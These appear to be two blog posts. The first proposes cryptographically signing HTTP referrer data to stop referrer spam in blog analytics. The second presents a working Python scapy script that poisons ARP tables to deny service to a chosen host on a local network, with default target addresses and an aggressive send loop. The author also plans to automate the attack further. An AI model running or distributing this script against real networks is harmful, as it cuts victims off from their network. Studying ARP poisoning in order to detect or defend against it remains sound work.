Using cryptography as a protection from 'Referrer Spam'

I was recently looking at the analytics of my blog and found that for certain visits, the referrer was pointing to some spam websites. After a bit of testing I figured that the referrer section could be spoofed easily while making an HTTP request for any blog hosted by that provider. After some internet lookups, I learnt that the term for such an attack is 'Referrer Spam'. This could mean that someone with the right tools and wrong intent could modify the HTTP header to do two things:

         a. Spoof the referrer
         b. Blank out the referrer

Both of these are not beneficial for analytics or the referrer. One workaround to mitigate such spoofing can be by using cryptography for enforcing integrity checks to avoid feeding false data to the analytics engine. The idea is to encrypt the concatenation of the virtual path in the URL and the Hash of the data in the referrer section.

The following method can be followed:

Referrer Server:
1. Encrypt URL+Hash of data in 'Referrer' section using referrer's private key

Blog's Web Server:
1. Blog provider checks the referrer's section and checks if domain is known.
2. Reconstruct the virtual path by decrypting using referrer's public key and validate the hash with the data in 'Referrer' section.
3. If step 2 does not fail, display the content to user and log data to the analytics engine.

In the above method, symmetric keys can also be used, however, key renewal on a timely basis might be required.

The advantage of the above technique is that unknown referrers can be marked, separated and their IPs can be flagged if further processing of spam source is required.

Cons:
1. Attackers can cause a Denial of Service attack by overloading the Decryption section with junk data
2. Prior key exchange with 'known' referrers is required
3. All unknown referrers are considered as spammers/malicious unless further processing 'clears' them.

Simple ARP poison script in python

A quick python script to DoS a host on the network. It uses scapy and you can set default values in the script. The attack relies on ARP poisoning and the ARP entries on arp_dest_ip are flooded with a fake victim_mac. The target's IP address is specified by victim_ip.

Here's the script:

#!/usr/bin/python
#DoS.py
#Default target is 10.0.3.3
import sys
from scapy.all import *

try:
      if(sys.argv[1] == "-h"):
            print("Usage:")
           print("DoS [victim_ip] [arp_dest_ip] [arp_dest_mac] [victim_mac]")
           exit(0)
except IndexError:
      print("Attacking....")

x=ARP()
x.op=2
try:
      x.psrc=sys.argv[1] #SOURCE_IP
except IndexError:
      x.psrc="10.0.3.3"
try:
      x.hwsrc=sys.argv[4] #SOURCE_MAC
except IndexError:
      x.hwsrc="FF:FF:FF:FF:FF:FF" #Put a fake MAC address here
try:
      x.pdst=sys.argv[2] #DEST_IP
      x.hwdst=sys.argv[3] #DEST_MAC
except IndexError:
      x.pdst="10.0.3.1" #Usually contains the IP of the gateway
      x.hwdst="FF:FF:FF:AB:CD:EF" #Should contain the MAC of the IP defined as x.pdst

x.show()

sr(x,inter=0.0000000000000001,retry=-999999999,timeout=0.00000000000001)

Next I would want to automate most of the stuff above where minimum inputs would be required and other kind of logic where the attacker pauses attack if the target quits the network etc.

I am also thinking about how to thwart or raise an alert on such an attack...

P.S. I know scapy has pre-defined functions to conduct ARP attacks...I'm doing it manually just for the kicks...